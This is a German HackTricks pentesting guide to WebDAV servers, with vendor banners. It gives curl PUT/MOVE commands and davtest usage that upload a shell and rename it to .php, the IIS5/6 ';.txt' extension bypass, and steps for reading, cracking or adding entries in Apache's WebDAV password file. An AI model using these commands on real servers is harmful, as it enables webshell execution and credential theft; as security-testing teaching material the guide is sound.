hacktricks/network-services-pentesting/pentesting-web/put-method-webdav.md

7.8 KiB

WebDav


Verwenden Sie Trickest, um Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Beim Umgang mit einem HTTP-Server mit aktiviertem WebDav ist es möglich, Dateien zu manipulieren, wenn Sie über die richtigen Anmeldeinformationen verfügen, die in der Regel über die HTTP-Basisauthentifizierung überprüft werden. Die Kontrolle über einen solchen Server zu erlangen, beinhaltet oft das Hochladen und Ausführen einer Webshell.

Der Zugriff auf den WebDav-Server erfordert in der Regel gültige Anmeldeinformationen, wobei WebDav-Bruteforce eine häufige Methode ist, um sie zu erhalten.

Um Beschränkungen bei Datei-Uploads zu überwinden, insbesondere solche, die die Ausführung von serverseitigen Skripten verhindern, könnten Sie:

  • Dateien mit ausführbaren Erweiterungen direkt hochladen, wenn sie nicht eingeschränkt sind.
  • Umbenennen von hochgeladenen nicht ausführbaren Dateien (wie .txt) in eine ausführbare Erweiterung.
  • Kopieren von hochgeladenen nicht ausführbaren Dateien und Ändern ihrer Erweiterung in eine ausführbare.

DavTest

Davtest versucht, mehrere Dateien mit verschiedenen Erweiterungen hochzuladen und zu überprüfen, ob die Erweiterung ausgeführt wird:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Cadaver

Sie können dieses Tool verwenden, um sich mit dem WebDav-Server zu verbinden und Aktionen (wie Hochladen, Verschieben oder Löschen) manuell durchzuführen.

cadaver <IP>

PUT-Anfrage

curl -T 'shell.txt' 'http://$ip'

MOVE-Anforderung

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'


Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

IIS5/6 WebDav-Schwachstelle

Diese Schwachstelle ist sehr interessant. Das WebDav erlaubt es nicht, Dateien mit der Erweiterung .asp hochzuladen oder umzubenennen. Aber Sie können dies umgehen, indem Sie am Ende des Namens ";.txt" hinzufügen, und die Datei wird ausgeführt, als ob es sich um eine .asp-Datei handeln würde (Sie könnten auch ".html" anstelle von ".txt" verwenden, aber vergessen Sie das ";" nicht).

Dann können Sie Ihre Shell als ".txt-Datei hochladen und sie in eine ".asp;.txt"-Datei kopieren/verschieben. Wenn Sie auf diese Datei über den Webserver zugreifen, wird sie ausgeführt (cadaver wird sagen, dass die Verschiebeaktion nicht funktioniert hat, aber das hat sie).

Post-Anmeldeinformationen

Wenn der Webdav einen Apache-Server verwendet, sollten Sie die konfigurierten Websites in Apache überprüfen. Üblicherweise:
/etc/apache2/sites-enabled/000-default

Darin könnten Sie etwas wie:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Wie Sie sehen können, gibt es die Dateien mit den gültigen Anmeldedaten für den WebDAV-Server:

/etc/apache2/users.password

Im Inneren dieser Art von Dateien finden Sie den Benutzernamen und einen Hash des Passworts. Dies sind die Anmeldeinformationen, die der WebDAV-Server verwendet, um Benutzer zu authentifizieren.

Sie können versuchen, sie zu knacken, oder weitere hinzufügen, wenn Sie aus irgendeinem Grund auf den WebDAV-Server zugreifen möchten:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Um zu überprüfen, ob die neuen Anmeldedaten funktionieren, können Sie Folgendes tun:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Referenzen

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:


Verwenden Sie Trickest, um mühelos Workflows zu erstellen und zu automatisieren, die von den weltweit fortschrittlichsten Community-Tools unterstützt werden.
Heute Zugriff erhalten:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}